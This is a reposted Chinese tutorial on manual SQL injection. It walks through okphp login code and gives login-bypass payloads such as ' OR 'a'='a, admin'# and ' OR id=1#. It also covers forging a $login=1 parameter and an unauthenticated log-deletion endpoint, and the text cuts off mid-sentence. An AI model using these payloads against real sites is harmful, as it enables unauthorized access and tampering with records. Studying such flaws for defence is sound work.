手工注射php学习

2016-01-29 13:04 6 1 收藏

手工注射php学习,手工注射php学习

【 tulaoshi.com - PHP 】

转自：http://www6.blog.163.com/article/-2jc4-x8C13g.html

代码：
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);

$q = "select id,group_id from $user_table where username='$username' and password='$password'"中
$username 和 $password 没过滤，很容易就绕过。
对于select * from $user_table where username='$username' and password='$password'这样的语句改造的方法有：

构造1（利用逻辑运算）：$username=' OR 'a'='a $password=' OR 'a'='a

相当于sql语句：
select * from $user_table where username= OR 'a'='a' and password= OR 'a'='a'

构造2（利用mysql里的注释语句# ，/* 把$password注释掉）：$username=admin'#（或admin'/*)

即：
select * from $user_table where username='admin'#' and password='$password'"

相当于：
select * from $user_table where username='admin'

在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2：

select id,group_id from $user_table where username='admin'#' and password='$password'"

相当于：
select id,group_id from $user_table where username='admin'

只要存在用户名为admin的就成立，如果不知道用户名，只知道对应的id，
我们就可以这样构造：$username=' OR id=1#

相当于：
select id,group_id from $user_table where username='' OR id=1# and password='$password'(#后的被注释掉)

我们接着往下看代码：
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
$login = 0;
}

else {
$login = 1;
}
}
// Fail to login
---
if (!$login) {
write_log("Moderator login","0","password wrong");
echo "<scriptalert('login failed!');history.go(-1);</script";
exit();
}
// Access !
-
else {
session_start();

呵呵~~ 最后简单通过一个$login来判断，我们只要ie提交直接提交$login=1 就可以绕过了 :)。

2.users/login.php注射导致绕过身份验证漏洞：
代码：
$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);

$username没过滤利用同1里注释掉and password='$md5password'";就绕过啦。

3.adminloglist.php存在任意删除日志记录漏洞。（ps：这个好象和php+mysql注射无关，随便提一下）

okphp的后台好象写得很马虎，所有文件都没有判断管理员是否已经登陆，以至于任意访问。我们看list.php的代码：

$arr = array("del_log","log_id","del_id");
get_r($arr);
//
if ($del_log) {
省略........
if ($log_id) {
foreach ($log_id as $val) {
$q = "delete from $log_table where id='$val'";
$res = sql_query($q,$conn);
if ($res) {
$i++;
}
}
}
elseif ($del_id) {
$q = "delete from $log_table where id='$del_id'";
$res = sql_query($q,$conn);
}
$tpl-setVariable("message","$i log deleted ok!");
$tpl-setVariable("action","index.php?action=list_log");
}

代码就只简单的用get_r($arr);判断的提交的参数，我

来源:http://www.tulaoshi.com/n/20160129/1488774.html

上一篇： Flash MX pro的历史面板(3)
下一篇：动态加载类的原理——元数据的使用

看过《手工注射php学习》的人还看了以下文章更多>>

PHP的FTP学习(四)

标签： PHP

以下是代码列表： -------------------------------------------------------------------------------- <!-- code for index.html begins here -- <html <head <basefont face=arial </head <body <table border=0 align=center <form action="actions.php" method=post <inpu...

IIS+mysql+php学习

标签： PHP

再往上找到很多资料版本都非常老，新发现这个似乎不错！linews可能采用php！下面有人说不成功，下面我以WIN2003系统为例，重新安装配置演示下，增加截图给大家，强烈希望斑竹加精！如果你在安装过程遇到问题欢迎光临http://bbs.xqin.com提出，本人将尽量帮忙解决！完整标题： Windows 2000/XP/2003 下 IIS+PHP+MySQL+Zend Optimizer+...

PHP的FTP学习（一）

标签： PHP

By Vikram Vaswani Melonfire November 07, 2000 我们是一群PHP的忠实FANS，我们因各种不同的原因使用它-WEB站点的开发，画图，数据库的联接等 -我们发现，它非常的友好，强大而且易于使用你可能已经看到PHP是怎样被用于创建GIF和JPEG图像，从数据库中动态的获取信息等等，但这只是冰山...

PHP的FTP学习(二)

标签： PHP

By Vikram Vaswani Melonfire November 07, 2000 登录了FTP服务器，PHP提供了一些函数，它们能获取一些关于系统和文件以及目录的信息。 ftp_pwd() 如果你想知道你当前所在的目录时，你就要用到这个函数了。 -------------------------------------------------------------------------------- <? // get current...

实例学习php之投票程序

标签： PHP

实例学习PHP之投票程序 -------------------------------------------------------------------------------- 2002-12-20 14:12:12 www.code-labs.com 如果你从来没有接触过PHP,那么还是先看看这个吧，当然即使是你已经对PHP有所了解，但一本PHP4的的使用手册...

查看更多精彩>>